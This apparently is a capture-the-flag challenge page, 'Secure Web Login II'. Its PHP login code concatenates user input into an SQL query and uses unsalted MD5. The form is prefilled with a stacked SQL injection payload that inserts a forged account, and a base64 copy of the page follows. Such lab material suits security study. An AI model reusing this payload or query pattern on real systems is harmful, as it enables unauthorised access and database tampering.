<html>
<head>
Secure Web Login II
</head>
<body>
 
<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect("localhost","php3","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
  mysql_select_db("php3");
 
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from php3 where user='$user'"));
 
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
    echo "<p>Logged in! Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
 
?>
 
 
<form method=post action=index.php>
<input type=text name=user value="';INSERT INTO php3 ('user','pw') VALUES ('vinhasd','5d41402abc4b2a76b9719d911017c592');--">
<input type=password name=pass value="hello">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>
 

PGh0bWw+CjxoZWFkPgpTZWN1cmUgV2ViIExvZ2luIElJCjwvaGVhZD4KPGJvZHk+Cgo8P3BocAppZigkX1BPU1RbdXNlcl0gJiYgJF9QT1NUW3Bhc3NdKSB7CiAgbXlzcWxfY29ubmVjdCgibG9jYWxob3N0IiwicGhwMyIsInh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4Iik7CiAgbXlzcWxfc2VsZWN0X2RiKCJwaHAzIik7CgogICR1c2VyID0gJF9QT1NUW3VzZXJdOwogICRwYXNzID0gbWQ1KCRfUE9TVFtwYXNzXSk7CiAgJHF1ZXJ5ID0gQG15c3FsX2ZldGNoX2FycmF5KG15c3FsX3F1ZXJ5KCJzZWxlY3QgcHcgZnJvbSBwaHAzIHdoZXJlIHVzZXI9JyR1c2VyJyIpKTsKCiAgaWYgKCgkcXVlcnlbcHddKSAmJiAoIXN0cmNhc2VjbXAoJHBhc3MsICRxdWVyeVtwd10pKSkgewogICAgZWNobyAiPHA+TG9nZ2VkIGluISBLZXk6IHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4IDwvcD4iOwogIH0KICBlbHNlIHsKICAgIGVjaG8oIjxwPkxvZyBpbiBmYWlsdXJlITwvcD4iKTsKICB9Cn0KCj8+CgoKPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWluZGV4LnBocD4KPGlucHV0IHR5cGU9dGV4dCBuYW1lPXVzZXIgdmFsdWU9Iic7SU5TRVJUIElOVE8gcGhwMyAoJ3VzZXInLCdwdycpIFZBTFVFUyAoJ3Zpbmhhc2QnLCc1ZDQxNDAyYWJjNGIyYTc2Yjk3MTlkOTExMDE3YzU5MicpOy0tIj4KPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzIHZhbHVlPSJoZWxsbyI+CjxpbnB1dCB0eXBlPXN1Ym1pdD4KPC9mb3JtPgo8L2JvZHk+CjxhIGhyZWY9ImluZGV4LnBocHMiPlNvdXJjZTwvYT4KPC9odG1sPgo=